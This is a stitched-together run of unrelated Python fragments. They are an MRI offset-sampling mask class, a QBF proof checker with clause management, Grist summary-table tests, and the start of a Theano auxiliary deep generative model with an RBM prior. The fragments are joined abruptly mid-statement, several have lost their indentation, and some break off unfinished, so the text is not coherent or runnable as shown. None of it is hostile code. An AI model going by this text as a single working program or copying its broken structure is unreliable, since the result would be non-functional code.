        by ``num_offsets`` -- confirm for the shapes used.
        """
        undersampling_masks = np.zeros((num_offsets, *shape[1:-1]))
        for offset in range(num_offsets):
            # One-hot stride pattern, phase-shifted per offset, tiled over
            # the flattened plane and reshaped back.
            pattern = np.zeros(num_offsets)
            pattern[offset] = 1
            undersampling_masks[offset] = np.tile(pattern, int(np.prod(shape[1:-1]) / num_offsets)).reshape(*shape[1:-1])
        # Fully sample the central third block in every offset mask.
        undersampling_masks[:, int(shape[1] * 2/6):int(shape[1] * 4/6), int(shape[2] * 2/6):int(shape[2] * 4/6)] = 1
        return undersampling_masks[None]
class MagicMaskFunc(MaskFunc):
"""
Masking function for exploiting conjugate symmetry via offset-sampling.
This function applies the mask described in the following paper:
<NAME>. (2019). Offset Sampling Improves Deep Learning based
Accelerated MRI Reconstructions by Exploiting Symmetry. arXiv preprint,
arXiv:1912.01101.
It is essentially an equispaced mask with an offset for the opposite site
of k-space. Since MRI images often exhibit approximate conjugate k-space
symmetry, this mask is generally more efficient than a standard equispaced
mask.
    Similarly to ``EquispacedMaskFunc``, this mask will usually undershoot the
target acceleration rate.
"""
def calculate_acceleration_mask(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
) -> np.ndarray:
"""
Produce mask for non-central acceleration lines.
Args:
num_cols: Number of columns of k-space (2D subsampling).
acceleration: Desired acceleration rate.
offset: Offset from 0 to begin masking. If no offset is specified,
then one is selected randomly.
num_low_frequencies: Not used.
Returns:
A mask for the high spatial frequencies of k-space.
"""
if offset is None:
offset = self.rng.randint(0, high=acceleration)
if offset % 2 == 0:
offset_pos = offset + 1
offset_neg = offset + 2
else:
offset_pos = offset - 1 + 3
offset_neg = offset - 1 + 0
poslen = (num_cols | |
with 0" % lineNumber)
return
vars = vars[:-1]
for v in vars:
if v <= 0 or v > self.nvar:
self.fail("Line %d. Invalid variable %d" % (lineNumber, v))
return
if v in foundDict:
self.fail("Line %d. Variable %d already declared on line %d" % (lineNumber, v, foundDict[v]))
return
foundDict[v] = lineNumber
self.varList.append((v, qlevel, isExistential))
# Prepare for next set of input variables
qlevel += 2
else:
if nclause == 0:
self.fail("Line %d. No header line. Not cnf" % (lineNumber))
return
# Check formatting
try:
lits = [int(s) for s in line.split()]
except:
self.fail("Line %d. Non-integer field" % lineNumber)
return
# Last one should be 0
if lits[-1] != 0:
self.fail("Line %d. Clause line should end with 0" % lineNumber)
return
lits = lits[:-1]
vars = sorted([abs(l) for l in lits])
if len(vars) == 0:
self.fail("Line %d. Empty clause" % lineNumber)
return
if vars[-1] > self.nvar or vars[0] == 0:
self.fail("Line %d. Out-of-range literal" % lineNumber)
return
for i in range(len(vars) - 1):
if vars[i] == vars[i+1]:
self.fail("Line %d. Opposite or repeated literal" % lineNumber)
return
self.clauses.append(lits)
clauseCount += 1
if clauseCount != nclause:
self.fail("Line %d: Got %d clauses. Expected %d" % (lineNumber, clauseCount, nclause))
return
# See if there are any undeclared variables
outerVars = [v for v in range(1, self.nvar+1) if v not in foundDict]
if len(outerVars) > 0:
# These must be added as existential variables in first quantifier block
ovarList = [(v, 1, True) for v in outerVars]
nvarList = [(v, qlevel+1, isExistential) for (v, qlevel, isExistential) in self.varList]
self.varList = ovarList + nvarList
# Clause processing
class ClauseManager:
    """Manage the clauses of a proof.

    Clauses are assigned consecutive integer Ids starting at 1.  A deleted
    clause keeps its slot in clauseDict with value None, so Ids are never
    reused and len(clauseDict) always yields the next available Id.  In
    verbose mode, per-literal clause sets and the set of live clause Ids are
    additionally maintained to produce richer diagnostic messages.
    """
    # The class-level values below serve as documentation of the instance
    # attributes; __init__ rebinds every one of them per instance.
    # Mapping from Id to clause. Deleted clauses represented by None
    clauseDict = {}
    # For each literal, count of clauses containing it
    literalCountDict = {}
    # For each literal, set of clauses containing it (only in verbose mode)
    literalSetDict = {}
    # Track whether have empty clause
    addedEmpty = False
    # Counters
    liveClauseCount = 0
    maxLiveClauseCount = 0
    totalClauseCount = 0
    # Clauses that haven't been deleted (only in verbose mode)
    liveClauseSet = set([])

    def __init__(self, verbose):
        self.verbose = verbose
        self.clauseDict = {}
        self.literalCountDict = {}
        self.literalSetDict = {}
        self.addedEmpty = False
        self.liveClauseCount = 0
        self.maxLiveClauseCount = 0
        self.totalClauseCount = 0
        self.liveClauseSet = set([])

    def findClause(self, id):
        """Look up a clause by Id.  Return (clause, "") or (None, reason)."""
        if id not in self.clauseDict:
            return (None, "Clause #%d never defined" % id)
        elif self.clauseDict[id] is None:
            return (None, "Clause #%d has been deleted" % id)
        else:
            return (self.clauseDict[id], "")

    # Add clause. Should have been processed with cleanClause
    # Return (T/F, reason)
    def addClause(self, clause, id = None):
        if not regularClause(clause):
            return (False, "Cannot add clause %s" % showClause(clause))
        # Deleted clauses keep their dictionary slots, so the dictionary
        # size gives the next sequential Id.
        newId = len(self.clauseDict)+1
        if id is not None and id != newId:
            return (False, "Invalid clause Id. Was expecting %d but got %s" % (newId, id))
        self.clauseDict[newId] = clause
        if len(clause) == 0:
            self.addedEmpty = True
        self.liveClauseCount += 1
        self.totalClauseCount += 1
        if self.verbose:
            self.liveClauseSet.add(newId)
        self.maxLiveClauseCount = max(self.liveClauseCount, self.maxLiveClauseCount)
        # Add literals
        for lit in clause:
            if lit in self.literalCountDict:
                self.literalCountDict[lit] += 1
                if self.verbose:
                    self.literalSetDict[lit].add(newId)
            else:
                self.literalCountDict[lit] = 1
                if self.verbose:
                    self.literalSetDict[lit] = set([newId])
        return (True, "")

    # Delete clause.
    # Return (T/F, reason)
    def deleteClause(self, id):
        clause, msg = self.findClause(id)
        if clause is None:
            return (False, "Cannot delete clause %d: %s" % (id, msg))
        self.clauseDict[id] = None
        self.liveClauseCount -= 1
        if self.verbose:
            self.liveClauseSet.remove(id)
        # Remove the clause's literals from the per-literal bookkeeping
        for lit in clause:
            self.literalCountDict[lit] -= 1
            if self.verbose:
                self.literalSetDict[lit].remove(id)
        return (True, "")

    # Check that clause is generated by set of antecedents
    # Assumes clause has been processed by cleanClause
    # Return (T/F, Reason)
    def checkResolution(self, clause, idList, subsetOK):
        # Antecedents are resolved in reverse order, folding each into a
        # running partial resolvent.
        rids = list(idList)
        rids.reverse()
        if rids[0] not in self.clauseDict:
            return (False, "Clause #%d does not exist" % rids[0])
        rclause, msg = self.findClause(rids[0])
        if rclause is None:
            return (False, "Resolution failed: %s" % msg)
        for nid in rids[1:]:
            nclause, msg = self.findClause(nid)
            if nclause is None:
                return (False, "Resolution failed: %s" % msg)
            try:
                rclause = resolveClauses(rclause, nclause)
            except ResolveException as ex:
                return (False, "Failed to resolve clause #%d (%s) with partial result %s (%s)" % (nid, showClause(nclause), showClause(rclause), str(ex)))
        # When subsetOK, a proper subset of the target clause is accepted;
        # otherwise the resolvent must equal the target exactly.
        if (subsetOK and testClauseSubset(rclause, clause)) or testClauseEquality(clause, rclause):
            return (True, "")
        else:
            key = "allowed" if subsetOK else "not allowed"
            return (False, "Antecedents resolve to %s, not to %s. Subset %s." % (showClause(rclause), showClause(clause), key))

    # Check that clause is blocked w.r.t. its first literal
    # Return (T/F, Reason)
    def checkBlocked(self, clause, blockList):
        if clause is None:
            return (False, "Invalid clause")
        if len(clause) == 0:
            return (False, "Empty clause")
        lit = clause[0]
        subclause = clause[1:]
        nlit = -lit
        if nlit not in self.literalCountDict:
            if len(blockList) == 0:
                return (True, "")
            else:
                # BUG FIX: the format arguments must be a tuple; the original
                # applied '%' to nlit alone and returned a 3-tuple.
                return (False, "No clauses recorded having literal %d. Expected %d" % (nlit, len(blockList)))
        if len(blockList) != self.literalCountDict[nlit]:
            msg = "Literal %d contained in %d clauses" % (nlit, self.literalCountDict[nlit])
            if self.verbose:
                msg += " (%s)" % str(list(self.literalSetDict[nlit]))
            msg += ". %d given" % (len(blockList))
            return (False, msg)
        # Every listed clause must contain the complement of some literal in
        # the remainder of the candidate clause.
        for nid in blockList:
            id = abs(nid)
            bclause, msg = self.findClause(id)
            if bclause is None:
                return (False, msg)
            found = False
            for clit in subclause:
                if -clit in bclause:
                    found = True
                    break
            if not found:
                return (False, "Couldn't find complementary literal in clause #%d" % id)
        return (True, "")

    # Check that resolventList gives all resolvents from sourceList by resolution on var
    def checkDavisPutnam(self, var, sourceList, resolventList, varDict):
        # varDict maps variable -> (quantifier level, isExistential)
        (vlevel, isExistential) = varDict[var]
        plist = []
        nlist = []
        for id in sourceList:
            clause, msg = self.findClause(id)
            if clause is None:
                return (False, msg)
            # Check all universal variables in clause
            for clit in clause:
                cvar = abs(clit)
                if cvar not in varDict:
                    return (False, "Unknown variable %d in clause #%d" % (cvar, id))
                (clevel, cex) = varDict[cvar]
                if not cex and clevel > vlevel:
                    return (False, "Higher universal variable %d in clause for D-P reduction on %d" % (cvar, var))
            if var in clause:
                plist.append(clause)
            elif -var in clause:
                nlist.append(clause)
            else:
                return (False, "Clause #%d includes neither %d nor -%d" % (id, var, var))
        # sourceList must account for every live clause mentioning var
        # NOTE(review): raises KeyError if var never occurred in any added
        # clause; callers presumably guarantee occurrence — confirm.
        if len(plist) != self.literalCountDict[var]:
            msg = "Expecting %d clauses containing literal %d. Found %d" % (len(plist), var, self.literalCountDict[var])
            if self.verbose:
                msg += " (%s)" % (str(list(self.literalSetDict[var])))
            return (False, msg)
        if len(nlist) != self.literalCountDict[-var]:
            msg = "Expecting %d clauses containing literal -%d. Found %d" % (len(nlist), var, self.literalCountDict[-var])
            if self.verbose:
                msg += " (%s)" % (str(list(self.literalSetDict[-var])))
            return (False, msg)
        checkList = []
        for id in resolventList:
            clause, msg = self.findClause(id)
            if clause is None:
                return (False, msg)
            checkList.append(clause)
        # Every non-trivial pairwise resolvent must appear among the
        # candidate resolvents.
        # NOTE(review): unlike checkResolution, this path expects
        # resolveClauses to return None for a tautological pair rather than
        # raise ResolveException — confirm against resolveClauses.
        for pclause in plist:
            for nclause in nlist:
                rclause = resolveClauses(pclause, nclause)
                if rclause is not None:
                    found = False
                    for mclause in checkList:
                        if testClauseEquality(rclause, mclause):
                            found = True
                            break
                    if not found:
                        return (False, "Couldn't find resolvent %s in candidate clauses" % showClause(rclause))
        return (True, "")
class ProofException(Exception):
    """Signals a proof-checking failure, optionally tagged with the
    offending proof-file line number."""

    def __init__(self, value, lineNumber = None):
        self.value = value
        self.lineNumber = lineNumber

    def __str__(self):
        location = "" if self.lineNumber is None else " (Line %d)" % self.lineNumber
        return "Proof Exception%s: %s" % (location, str(self.value))
class Prover:
verbose = False
lineNumber = 0
# Clause Manager
cmgr = None
# List of input variables.
# Mapping from variable number to (qlevel, isExistential)
varDict = {}
# Version of varDict created after shift variables
shiftedVarDict = {}
failed = False
# Levels for variables. Each is mapping from level to list of variables in that level
initialLevels = {}
shiftedLevels = {}
ruleCounters = {}
subsetOK = False
def __init__(self, qreader, verbose = False):
self.verbose = verbose
self.lineNumber = 0
self.cmgr = ClauseManager(verbose)
self.varDict = { v : (q, e) for (v, q, e) in qreader.varList }
self.shiftedVarDict = {}
self.failed = False
self.subsetOK = False
self.ruleCounters = {'a' : 0, 'ab' : 0, 'ar' : 0, 'd' : 0, 'dr' : 0, 'dd' : 0, 'l' : 0, 'u' : 0, 'x' : 0 }
for clause | |
"city", "count", "amount" ],
[ 1, "New York", 3, 1.+6+11 ],
[ 2, "Albany", 1, 2. ],
[ 3, "Seattle", 1, 3. ],
[ 4, "Chicago", 1, 4. ],
[ 5, "Bedford", 2, 5.+8 ],
[ 6, "Buffalo", 1, 7. ],
[ 7, "Boston", 1, 9. ],
[ 8, "Yonkers", 1, 10. ],
])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address'])
# Verify more fields of some of the new column objects.
self.assertTableData('_grist_Tables_column', rows="subset", cols="subset", data=[
['id', 'colId', 'type', 'formula', 'widgetOptions', 'label'],
[23, 'city', 'Text', '', '', 'City'],
[25, 'amount', 'Numeric', 'SUM($group.amount)', 'WidgetOptions2', 'Amount'],
])
# Change group-by to no columns (totals)
self.apply_user_action(["UpdateSummaryViewSection", 1, []])
self.assertTables([
self.starting_table,
# Note that Table #4 is gone at this point, since it's unused.
Table(5, "GristSummary_7_Address2", 0, 1, columns=[
Column(27, "count", "Int", True, "len($group)", 0),
Column(28, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(29, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=5, fields=[
Field(3, colRef=27),
Field(4, colRef=28),
])
])])
self.assertTableData('GristSummary_7_Address2', cols="subset", data=[
[ "id", "count", "amount"],
[ 1, 11, 66.0 ],
])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address2'])
# Back to full circle, but with group-by columns differently arranged.
self.apply_user_action(["UpdateSummaryViewSection", 1, [12,11]])
self.assertTables([
self.starting_table,
# Note that Table #5 is gone at this point, since it's unused.
Table(6, "GristSummary_7_Address", 0, 1, columns=[
Column(30, "state", "Text", False, "", 12),
Column(31, "city", "Text", False, "", 11),
Column(32, "count", "Int", True, "len($group)", 0),
Column(33, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(34, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=6, fields=[
Field(5, colRef=30),
Field(6, colRef=31),
Field(3, colRef=32),
Field(4, colRef=33),
])
])])
self.assertTableData('GristSummary_7_Address', cols="subset", data=[
[ "id", "city", "state", "count", "amount" ],
[ 1, "New York", "NY" , 3, 1.+6+11 ],
[ 2, "Albany", "NY" , 1, 2. ],
[ 3, "Seattle", "WA" , 1, 3. ],
[ 4, "Chicago", "IL" , 1, 4. ],
[ 5, "Bedford", "MA" , 1, 5. ],
[ 6, "Buffalo", "NY" , 1, 7. ],
[ 7, "Bedford", "NY" , 1, 8. ],
[ 8, "Boston", "MA" , 1, 9. ],
[ 9, "Yonkers", "NY" , 1, 10. ],
])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address'])
# Now add a different view section with the same group-by columns.
self.apply_user_action(["CreateViewSection", 1, 1, "record", [11,12]])
self.assertTables([
self.starting_table,
Table(6, "GristSummary_7_Address", 0, 1, columns=[
Column(30, "state", "Text", False, "", 12),
Column(31, "city", "Text", False, "", 11),
Column(32, "count", "Int", True, "len($group)", 0),
Column(33, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(34, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=6, fields=[
Field(5, colRef=30),
Field(6, colRef=31),
Field(3, colRef=32),
Field(4, colRef=33),
]),
Section(2, parentKey="record", tableRef=6, fields=[
Field(7, colRef=31),
Field(8, colRef=30),
Field(9, colRef=32),
Field(10, colRef=33),
])
])])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address'])
# Change one view section, and ensure there are now two summary tables.
self.apply_user_action(["UpdateSummaryViewSection", 2, []])
self.assertTables([
self.starting_table,
Table(6, "GristSummary_7_Address", 0, 1, columns=[
Column(30, "state", "Text", False, "", 12),
Column(31, "city", "Text", False, "", 11),
Column(32, "count", "Int", True, "len($group)", 0),
Column(33, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(34, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
Table(7, "GristSummary_7_Address2", 0, 1, columns=[
Column(35, "count", "Int", True, "len($group)", 0),
Column(36, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(37, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=6, fields=[
Field(5, colRef=30),
Field(6, colRef=31),
Field(3, colRef=32),
Field(4, colRef=33),
]),
Section(2, parentKey="record", tableRef=7, fields=[
Field(9, colRef=35),
Field(10, colRef=36),
])
])])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address',
'#summary#GristSummary_7_Address2'])
# Delete one view section, and see that the summary table is gone.
self.apply_user_action(["RemoveViewSection", 2])
self.assertTables([
self.starting_table,
# Note that Table #7 is gone at this point, since it's now unused.
Table(6, "GristSummary_7_Address", 0, 1, columns=[
Column(30, "state", "Text", False, "", 12),
Column(31, "city", "Text", False, "", 11),
Column(32, "count", "Int", True, "len($group)", 0),
Column(33, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(34, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
])
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=6, fields=[
Field(5, colRef=30),
Field(6, colRef=31),
Field(3, colRef=32),
Field(4, colRef=33),
])
])])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address'])
# Delete source table, and ensure its summary table is also gone.
self.apply_user_action(["RemoveTable", "Address"])
self.assertTables([])
self.assertViews([])
#----------------------------------------------------------------------
def test_update_groupby_override(self):
    # Verify that if we add a group-by column that conflicts with a formula, group-by column wins.
    self.load_sample(self.sample)
    # Summarize table #1 (Address) grouped by colRef 12 ('state').
    self.apply_user_action(["CreateViewSection", 1, 0, "record", [12]])
    # Manually add a formula column named 'city' to the summary table; its
    # name will collide with the source 'city' column added as a group-by
    # column later in this test.
    self.apply_user_action(["AddColumn", "GristSummary_7_Address", "city",
        {"formula": "$state.lower()"}])
    # We should have a single summary table, and a single section referring to it.
    self.assertTables([
        self.starting_table,
        Table(2, "GristSummary_7_Address", 0, 1, columns=[
            Column(14, "state", "Text", False, "", 12),
            Column(15, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
            Column(16, "count", "Int", True, "len($group)", 0),
            Column(17, "amount", "Numeric", True, "SUM($group.amount)", 0),
            # The manually-added formula column (isFormula=True, no source col).
            Column(18, "city", "Any", True, "$state.lower()", 0),
        ]),
    ])
    self.assertViews([View(1, sections=[
        Section(1, parentKey="record", tableRef=2, fields=[
            Field(1, colRef=14),
            Field(2, colRef=16),
            Field(3, colRef=17),
            Field(4, colRef=18),
        ])
    ])])
    # The formula column computes the lower-cased state for each group.
    self.assertTableData('GristSummary_7_Address', cols="subset", data=[
        [ "id", "state", "count", "amount" , "city"],
        [ 1, "NY", 7, 1.+2+6+7+8+10+11 , "ny" ],
        [ 2, "WA", 1, 3. , "wa" ],
        [ 3, "IL", 1, 4. , "il" ],
        [ 4, "MA", 2, 5.+9 , "ma" ],
    ])
    # Change the section to add "city" as a group-by column; check that the formula is gone.
    self.apply_user_action(["UpdateSummaryViewSection", 1, [11,12]])
    # A new summary table replaces the old one; 'city' is now a plain
    # group-by column (isFormula=False, sourced from colRef 11), the
    # conflicting formula having been dropped.
    self.assertTables([
        self.starting_table,
        Table(3, "GristSummary_7_Address2", 0, 1, columns=[
            Column(19, "city", "Text", False, "", 11),
            Column(20, "state", "Text", False, "", 12),
            Column(21, "count", "Int", True, "len($group)", 0),
            Column(22, "amount", "Numeric", True, "SUM($group.amount)", 0),
            Column(23, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
        ]),
    ])
    self.assertViews([View(1, sections=[
        Section(1, parentKey="record", tableRef=3, fields=[
            # We requested 'city' to come before 'state', check that this is the case.
            Field(4, colRef=19),
            Field(1, colRef=20),
            Field(2, colRef=21),
            Field(3, colRef=22),
        ])
    ])])
# TODO We should have more tests on UpdateSummaryViewSection that rearranges columns in
# interesting ways (e.g. add new column to middle of existing group-by columns; put group-by
# columns in the middle of other fields then UpdateSummary to rearrange them).
#----------------------------------------------------------------------
def test_cleanup_on_view_remove(self):
    # Verify that if we remove a view, that unused summary tables get cleaned up.
    # Create one view with one summary section, and another view with three sections.
    self.load_sample(self.sample)
    self.apply_user_action(["CreateViewSection", 1, 0, "record", [11,12]]) # Creates View #1
    self.apply_user_action(["CreateViewSection", 1, 0, "record", []]) # Creates View #2
    self.apply_user_action(["CreateViewSection", 1, 2, "record", [11,12]]) # Refers to View #2
    self.apply_user_action(["CreateViewSection", 1, 2, "record", [12]]) # Refers to View #2
    # Three distinct group-by sets -> three summary tables.  The [11,12]
    # set is shared by sections in both views (Table #2 below).
    self.assertTables([
        self.starting_table,
        Table(2, "GristSummary_7_Address", 0, 1, columns=[
            Column(14, "city", "Text", False, "", 11),
            Column(15, "state", "Text", False, "", 12),
            Column(16, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
            Column(17, "count", "Int", True, "len($group)", 0),
            Column(18, "amount", "Numeric", True, "SUM($group.amount)", 0),
        ]),
        # Totals table (no group-by columns), used only by View #2.
        Table(3, "GristSummary_7_Address2", 0, 1, columns=[
            Column(19, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
            Column(20, "count", "Int", True, "len($group)", 0),
            Column(21, "amount", "Numeric", True, "SUM($group.amount)", 0),
        ]),
        # Grouped by 'state' only, used only by View #2.
        Table(4, "GristSummary_7_Address3", 0, 1, columns=[
            Column(22, "state", "Text", False, "", 12),
            Column(23, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
            Column(24, "count", "Int", True, "len($group)", 0),
            Column(25, "amount", "Numeric", True, "SUM($group.amount)", 0),
        ]),
    ])
    self.assertViews([View(1, sections=[
        Section(1, parentKey="record", tableRef=2, fields=[
            Field(1, colRef=14),
            Field(2, colRef=15),
            Field(3, colRef=17),
            Field(4, colRef=18),
        ])
    ]), View(2, sections=[
        Section(2, parentKey="record", tableRef=3, fields=[
            Field(5, colRef=20),
            Field(6, colRef=21),
        ]),
        # This section shares summary Table #2 with View #1's section.
        Section(3, parentKey="record", tableRef=2, fields=[
            Field(7, colRef=14),
            Field(8, colRef=15),
            Field(9, colRef=17),
            Field(10, colRef=18),
        ]),
        Section(4, parentKey="record", tableRef=4, fields=[
            Field(11, colRef=22),
            Field(12, colRef=24),
            Field(13, colRef=25),
        ])
    ])])
    # Remove View #2, taking its three sections with it.
    self.apply_user_action(["RemoveView", 2])
    # Verify that unused summary tables are also gone, but the one used remains.
    self.assertTables([
        self.starting_table,
        Table(2, "GristSummary_7_Address", 0, 1, columns=[
            Column(14, "city", "Text", False, "", 11),
            Column(15, "state", "Text", False, "", 12),
            Column(16, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
            Column(17, "count", "Int", True, "len($group)", 0),
            Column(18, "amount", "Numeric", True, "SUM($group.amount)", 0),
        ]),
    ])
    self.assertViews([View(1, sections=[
        Section(1, parentKey="record", tableRef=2, fields=[
            Field(1, colRef=14),
            Field(2, colRef=15),
            Field(3, colRef=17),
            Field(4, colRef=18),
        ])
    ])])
#----------------------------------------------------------------------
@test_engine.test_undo
def test_update_sort_spec(self):
# Verify that we correctly update sort spec when we update a summary view section.
self.load_sample(self.sample)
self.apply_user_action(["CreateViewSection", 1, 0, "record", [11,12]])
self.apply_user_action(["UpdateRecord", "_grist_Views_section", 1,
{"sortColRefs": "[15,14,-17]"}])
# We should have a single summary table, and a single section referring to it.
self.assertTables([
self.starting_table,
Table(2, "GristSummary_7_Address", 0, 1, columns=[
Column(14, "city", "Text", False, "", 11),
Column(15, "state", "Text", | |
<reponame>kuleshov/neural-variational-inference
import time
import pickle
import numpy as np
from collections import OrderedDict
import theano
import theano.tensor as T
import lasagne
from theano.gradient import disconnected_grad as dg
from model import Model
from layers.shape import RepeatLayer
from layers import (
GaussianSampleLayer,
BernoulliSampleLayer,
GaussianMultiSampleLayer,
)
from helpers import (
iterate_minibatch_idx,
iterate_minibatches,
evaluate,
log_metrics
)
from distributions import log_bernoulli, log_normal2
from helpers import Tlogsumexp
from theano.tensor.shared_randomstreams import RandomStreams
from rbm import RBM
from aux_variational_rbm import AuxiliaryVariationalRBM
# ----------------------------------------------------------------------------
class UDADGM(Model):
"""Auxiliary Deep Generative Model (unsupervised version) with discrete z"""
def __init__(
    self, n_dim, n_out, n_chan=1, n_superbatch=12800, model='bernoulli',
    opt_alg='adam', opt_params={'lr' : 1e-3, 'b1': 0.9, 'b2': 0.99}
):
    """Build the model and compile its Theano training/loss functions.

    Args:
        n_dim: side length of the (square) input images.
        n_out: number of outputs (forwarded to the Model base class).
        n_chan: number of image channels.
        n_superbatch: size of the device-resident data superbatch
            (presumably — defined in the Model base class; not shown here).
        model: observation model, 'bernoulli' or 'gaussian'.
        opt_alg: optimizer name understood by Model.create_updates.
        opt_params: optimizer hyper-parameters.
    """
    # save model that will be created
    self.model = model
    self.n_sample = 3 # adjustable parameter, though 1 works best in practice
    # Model.__init__ drives create_model/create_objectives/create_gradients
    # and must run before self.inputs/self.objectives/self.updates are read
    # below — do not reorder.
    Model.__init__(self, n_dim, n_chan, n_out, n_superbatch, opt_alg, opt_params)
    # random number generators
    self.numpy_rng = np.random.RandomState(1234)
    self.theano_rng = RandomStreams(self.numpy_rng.randint(2 ** 30))
    (X, Y, idx1, idx2, S) = self.inputs
    loss, acc = self.objectives
    # Training function indexes a slice [idx1:idx2] of the GPU superbatch;
    # it also reports the mean RBM log-energy and the sampled z.
    self.train = theano.function(
        [idx1, idx2, self.alpha], [loss, self.log_e, self.z], updates=self.updates,
        givens={X: self.train_set_x[idx1:idx2], Y: self.train_set_y[idx1:idx2]},
        on_unused_input='warn'
    )
    llik = self.create_llik()
    # Evaluation function: loss plus log-likelihood estimate on raw data.
    self.loss = theano.function(
        [X, Y], [loss, llik],
        on_unused_input='warn',
    )
def create_model(self, X, Y, n_dim, n_out, n_chan=1):
    """Construct the encoder q(a|x) and q(z|a,x), decoder p(x|z) and
    p(a|z), and the control-variate (baseline) network.

    Args:
        X: symbolic input batch of shape (batch, n_chan, n_dim, n_dim).
        Y: symbolic labels (unused by this unsupervised model).
        n_dim: image side length.
        n_out: overwritten below with the flattened pixel count.
        n_chan: number of image channels.

    Returns:
        (l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma,
         l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma,
         l_qa, l_qz, l_cv, c, v) — the 13-element tuple stored as
        self.network and unpacked throughout this class.
    """
    # params
    n_lat = 64 # latent stochastic variables
    n_aux = 10 # auxiliary variables
    n_hid = 500 # size of hidden layer in encoder/decoder
    n_sam = self.n_sample # number of monte-carlo samples
    n_hid_cv = 500 # size of hidden layer in control variate net
    n_out = n_dim * n_dim * n_chan # total dimensionality of output
    hid_nl = lasagne.nonlinearities.tanh
    relu_shift = lambda av: T.nnet.relu(av+10)-10 # for numerical stability
    # RBM prior over z; its batch size 128*n_sam must agree with the
    # hard-coded reshape in _create_components.
    # self.rbm = RBM(n_dim=int(np.sqrt(n_lat)), n_out=10, n_chan=1, opt_params={'nb':128})
    self.rbm = AuxiliaryVariationalRBM(n_dim=int(np.sqrt(n_lat)), n_out=10, n_chan=1, opt_params={'nb':128*n_sam})
    # create the encoder network
    # create q(a|x)
    l_qa_in = lasagne.layers.InputLayer(
        shape=(None, n_chan, n_dim, n_dim),
        input_var=X,
    )
    # NOTE(review): l_qa_hid is built but never referenced below — the
    # aux-posterior mean/logsigma layers read straight from l_qa_in.
    # Possibly they were intended to read from l_qa_hid; confirm.
    l_qa_hid = lasagne.layers.DenseLayer(
        l_qa_in, num_units=n_hid,
        nonlinearity=hid_nl,
    )
    l_qa_mu = lasagne.layers.DenseLayer(
        l_qa_in, num_units=n_aux,
        nonlinearity=None,
    )
    l_qa_logsigma = lasagne.layers.DenseLayer(
        l_qa_in, num_units=n_aux,
        nonlinearity=relu_shift,
    )
    # repeatedly sample: tile mu/logsigma n_sam times along a new axis,
    # then flatten back to (batch * n_sam, n_aux)
    l_qa_mu = lasagne.layers.ReshapeLayer(
        RepeatLayer(l_qa_mu, n_ax=1, n_rep=n_sam),
        shape=(-1, n_aux),
    )
    l_qa_logsigma = lasagne.layers.ReshapeLayer(
        RepeatLayer(l_qa_logsigma, n_ax=1, n_rep=n_sam),
        shape=(-1, n_aux),
    )
    l_qa = GaussianSampleLayer(l_qa_mu, l_qa_logsigma)
    # create q(z|a,x): sums a branch on the auxiliary a with a branch on x
    l_qz_in = lasagne.layers.InputLayer((None, n_aux))
    l_qz_hid1a = lasagne.layers.DenseLayer(
        l_qz_in, num_units=n_hid,
        nonlinearity=hid_nl,
    )
    l_qz_hid1b = lasagne.layers.DenseLayer(
        l_qa_in, num_units=n_hid,
        nonlinearity=hid_nl,
    )
    # replicate the x-branch so its batch dimension matches the
    # n_sam-times-repeated a-branch
    l_qz_hid1b = lasagne.layers.ReshapeLayer(
        RepeatLayer(l_qz_hid1b, n_ax=1, n_rep=n_sam),
        shape=(-1, n_hid),
    )
    l_qz_hid2 = lasagne.layers.ElemwiseSumLayer([l_qz_hid1a, l_qz_hid1b])
    l_qz_hid3 = lasagne.layers.DenseLayer(
        l_qz_hid2, num_units=n_hid,
        nonlinearity=hid_nl,
    )
    # Bernoulli mean for the discrete latent z
    l_qz_mu = lasagne.layers.DenseLayer(
        l_qz_hid3, num_units=n_lat,
        nonlinearity=T.nnet.sigmoid,
    )
    l_qz = BernoulliSampleLayer(l_qz_mu)
    l_qz_logsigma = None # z is discrete: no scale parameter
    # create the decoder network
    # create p(x|z)
    l_px_in = lasagne.layers.InputLayer((None, n_lat))
    l_px_hid = lasagne.layers.DenseLayer(
        l_px_in, num_units=n_hid,
        W=lasagne.init.GlorotUniform(),
        nonlinearity=hid_nl,
    )
    l_px_mu, l_px_logsigma = None, None
    if self.model == 'bernoulli':
        l_px_mu = lasagne.layers.DenseLayer(
            l_px_hid, num_units=n_out,
            nonlinearity=lasagne.nonlinearities.sigmoid,
        )
    elif self.model == 'gaussian':
        l_px_mu = lasagne.layers.DenseLayer(
            l_px_hid, num_units=n_out,
            nonlinearity=None,
        )
        l_px_logsigma = lasagne.layers.DenseLayer(
